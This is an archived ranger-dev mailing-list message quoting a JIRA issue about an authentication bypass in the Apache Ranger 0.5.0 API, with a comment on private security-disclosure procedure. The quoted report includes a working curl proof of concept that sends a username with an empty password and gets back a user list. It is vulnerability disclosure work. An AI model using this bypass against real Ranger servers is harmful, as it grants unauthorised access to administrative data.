ranger-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Larry McCay (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (RANGER-835) Authentication bypass in Ranger API
Date Wed, 10 Feb 2016 19:38:18 GMT

    [ https://issues.apache.org/jira/browse/RANGER-835?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15141509#comment-15141509
] 

Larry McCay commented on RANGER-835:
------------------------------------

[~dillidorai] - 

The fact that #15 would leak implementation details and the ability to reverse engineer an
exploit if you were to follow it does not explicitly require that such things be made public.
Since Ranger is not using svn it is perfectly acceptable to not follow #15 - as you have pointed
out.

Steps #9-12 clearly describe that the details be discussed and agreed upon in private on either
the project security or private email lists. PPMC members are encouraged to review and discuss
the approach taken for such issues on those lists.

Thanks again.

> Authentication bypass in Ranger API
> -----------------------------------
>
>                 Key: RANGER-835
>                 URL: https://issues.apache.org/jira/browse/RANGER-835
>             Project: Ranger
>          Issue Type: Bug
>          Components: Ranger
>    Affects Versions: 0.5.0
>            Reporter: Jim Halfpenny
>            Priority: Critical
>              Labels: authentication, security, vulnerability
>             Fix For: 0.5.1, 0.6.0
>
>
> Authentication to the Ranger API can be trivially bypassed by sending a valid username
along with a null password. API authentication appears to work correctly, rejecting requests
if the password is incorrect but allows requests where no password has been sent.
> The example below uses curl to demonstrate this issue by retrieving a list of the users.
> $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
> *   Trying 127.0.0.1...
> * Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
> * Server auth using Basic with user 'admin'
> > HEAD /service/xusers/users HTTP/1.1
> > Host: 127.0.0.1:6080
> > Authorization: Basic YWRtaW46
> > User-Agent: curl/7.43.0
> > Accept: */*
> > 
> < HTTP/1.1 200 OK
> < Server: Apache-Coyote/1.1
> < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
> < Content-Type: application/xml
> < Content-Length: 0
> < Date: Fri, 05 Feb 2016 11:41:16 GMT
> < 
> <?xml version="1.0" encoding="UTF-8" standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

Mime
View raw message